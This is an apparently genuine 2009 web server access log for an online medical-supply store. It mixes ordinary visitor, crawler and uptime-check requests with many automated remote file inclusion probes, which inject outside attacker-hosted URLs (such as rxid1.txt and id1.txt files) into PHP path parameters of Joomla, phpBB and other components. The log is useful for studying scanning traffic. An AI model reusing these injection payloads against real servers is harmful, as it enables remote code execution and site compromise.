83.111.207.42 - - [16/Jun/2009:01:49:27 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 200 1970 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:27 -0400] "GET /images/head_btn-space1.gif HTTP/1.1" 200 5036 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:27 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 200 984 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:27 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 200 1531 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:27 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 200 1768 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:27 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 200 1729 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/head_surgical-supply.gif HTTP/1.1" 200 764 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/head_btn-aboutUs.gif HTTP/1.1" 200 1459 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/head_btn-tutorials.gif HTTP/1.1" 200 1160 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 200 1250 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/head_btn-spacer2.gif HTTP/1.1" 200 2237 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:28 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:29 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:29 -0400] "GET /images/blend.jpg HTTP/1.1" 200 405 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:31 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 200 1392 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:31 -0400] "GET /images/head_aceLogo-over.gif HTTP/1.1" 200 1296 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:31 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:31 -0400] "GET /images/head_btn-shop-over.gif HTTP/1.1" 200 1473 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:31 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 200 1354 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:33 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 200 1097 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:33 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 200 1156 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:33 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 200 1195 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:33 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 200 1089 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:33 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 200 1110 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:34 -0400] "GET /images/head_btn-products-over.gif HTTP/1.1" 200 1396 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L2026C2436512030071DF01M+M37+ENG HTTP/1.1" 200 37788 "https://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37+funcparms+WEBKEY(A0100):REQACCT" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
83.111.207.42 - - [16/Jun/2009:01:49:37 -0400] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; yie8)"
84.201.208.50 - - [16/Jun/2009:01:49:44 -0400] "GET /logs/access_log.Q109052900%20%20//ncaster/admin/addons/archive/archive.php?adminfolder=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:19 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:19 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:19 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:28 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:28 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:28 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:34 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:34 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:50:34 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:51:01 -0400] "GET /logs/access_log.Q109060400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:01:51:21 -0400] "GET /logs/access_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:01:52:32 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:01:52:32 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:01:52:32 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
81.176.230.136 - - [16/Jun/2009:01:52:55 -0400] "GET /logs/access_log.Q109060400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
38.99.44.103 - - [16/Jun/2009:01:53:01 -0400] "GET /logs/access_log.Q108080200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
85.119.154.129 - - [16/Jun/2009:01:53:58 -0400] "GET /logs/access_log.Q109053100//?mosConfig_absolute_path=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
85.119.154.129 - - [16/Jun/2009:01:53:59 -0400] "GET //?mosConfig_absolute_path=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
85.119.154.129 - - [16/Jun/2009:01:53:59 -0400] "GET /logs//?mosConfig_absolute_path=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 200 5711 "-" "libwww-perl/5.805"
209.59.12.99 - - [16/Jun/2009:01:54:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
81.176.230.136 - - [16/Jun/2009:01:54:26 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
66.249.71.54 - - [16/Jun/2009:01:54:27 -0400] "GET /images/index6_icepacks.jpg HTTP/1.1" 200 5263 "-" "Googlebot-Image/1.0"
81.176.230.136 - - [16/Jun/2009:01:54:35 -0400] "GET /logs/access_log.Q109060400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://book-ua.org//upload/id1.txt? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
89.223.3.98 - - [16/Jun/2009:01:55:25 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
89.223.3.98 - - [16/Jun/2009:01:55:48 -0400] "GET /logs/access_log.Q109051800//?path%5Bdocroot%5D=http://bimonet.zat.su/id1.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
38.99.13.118 - - [16/Jun/2009:01:56:19 -0400] "GET /logs/error_log.Q108012000 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.44.103 - - [16/Jun/2009:01:56:43 -0400] "GET /logs/error_log.Q108010400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
98.116.62.213 - - [16/Jun/2009:01:57:27 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jun/2009:01:57:27 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jun/2009:01:57:27 -0400] "GET /logs/access_log.Q109060600//components/com_forum/download.php?phpbb_root_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
98.116.62.213 - - [16/Jun/2009:01:57:31 -0400] "GET /logs/access_log.Q109060300//components/com_forum/download.php?phpbb_root_path=http://dentyx.com/shop/upload/category/1.swf? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Jun/2009:01:59:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
38.99.44.103 - - [16/Jun/2009:01:59:34 -0400] "GET /logs/access_log.Q107090200 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.13.118 - - [16/Jun/2009:01:59:35 -0400] "GET /logs/error_log.Q108021800 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
66.249.71.14 - - [16/Jun/2009:02:01:49 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L004A904F25526600CEBE071+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
38.99.44.103 - - [16/Jun/2009:02:02:12 -0400] "GET /images/_notes/download_autogft_lg.jpg.mno HTTP/1.0" 200 258 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
38.99.13.118 - - [16/Jun/2009:02:02:20 -0400] "GET /logs/error_log.Q108032400 HTTP/1.0" 404 223 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
85.119.154.129 - - [16/Jun/2009:02:02:46 -0400] "GET //?mosConfig_absolute_path=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
91.198.32.3 - - [16/Jun/2009:02:03:19 -0400] "GET //ashnews.php?pathtoashnews=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
209.59.12.99 - - [16/Jun/2009:02:04:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
209.59.12.99 - - [16/Jun/2009:02:09:10 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
85.119.154.129 - - [16/Jun/2009:02:09:15 -0400] "GET /logs/error_log.Q109053100//?mosConfig_absolute_path=http://www.vuurwerkessen.be/cache/Robot.txt??? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
199.120.90.222 - - [16/Jun/2009:02:09:56 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:09:56 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:09:56 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.198.32.3 - - [16/Jun/2009:02:09:57 -0400] "GET /logs/access_log.Q109050700//ashnews.php?pathtoashnews=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
91.198.32.3 - - [16/Jun/2009:02:09:57 -0400] "GET /logs//ashnews.php?pathtoashnews=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
91.198.32.3 - - [16/Jun/2009:02:10:07 -0400] "GET /logs/access_log.Q109053100//ashnews.php?pathtoashnews=http://www.aptd.ru/files/info.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
199.120.90.222 - - [16/Jun/2009:02:10:08 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:10:09 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:10:09 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:10:22 -0400] "GET /logs/access_log.Q109060400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:10:38 -0400] "GET /logs/access_log.Q109060400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
77.240.235.130 - - [16/Jun/2009:02:11:12 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:11:12 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:11:12 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
38.99.44.103 - - [16/Jun/2009:02:11:27 -0400] "GET /logs/access_log.Q107080600 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
77.240.235.130 - - [16/Jun/2009:02:12:10 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:12:11 -0400] "GET //index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:12:11 -0400] "GET /logs//index.php?option=com_datsogallery&&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
199.120.90.222 - - [16/Jun/2009:02:12:16 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:18 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:20 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:21 -0400] "GET /logs/access_log.Q109052400/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:22 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:22 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
77.240.235.130 - - [16/Jun/2009:02:12:24 -0400] "GET /logs/access_log.Q109060400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:12:24 -0400] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.808"
77.240.235.130 - - [16/Jun/2009:02:12:25 -0400] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.808"
199.120.90.222 - - [16/Jun/2009:02:12:29 -0400] "GET /logs/access_log.Q109052400%20%20/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:29 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:29 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
199.120.90.222 - - [16/Jun/2009:02:12:33 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://115.137.197.60/2002/.sh/responz/rxid1.txt?? HTTP/1.1" 404 247 "-" "Mozilla/5.0"
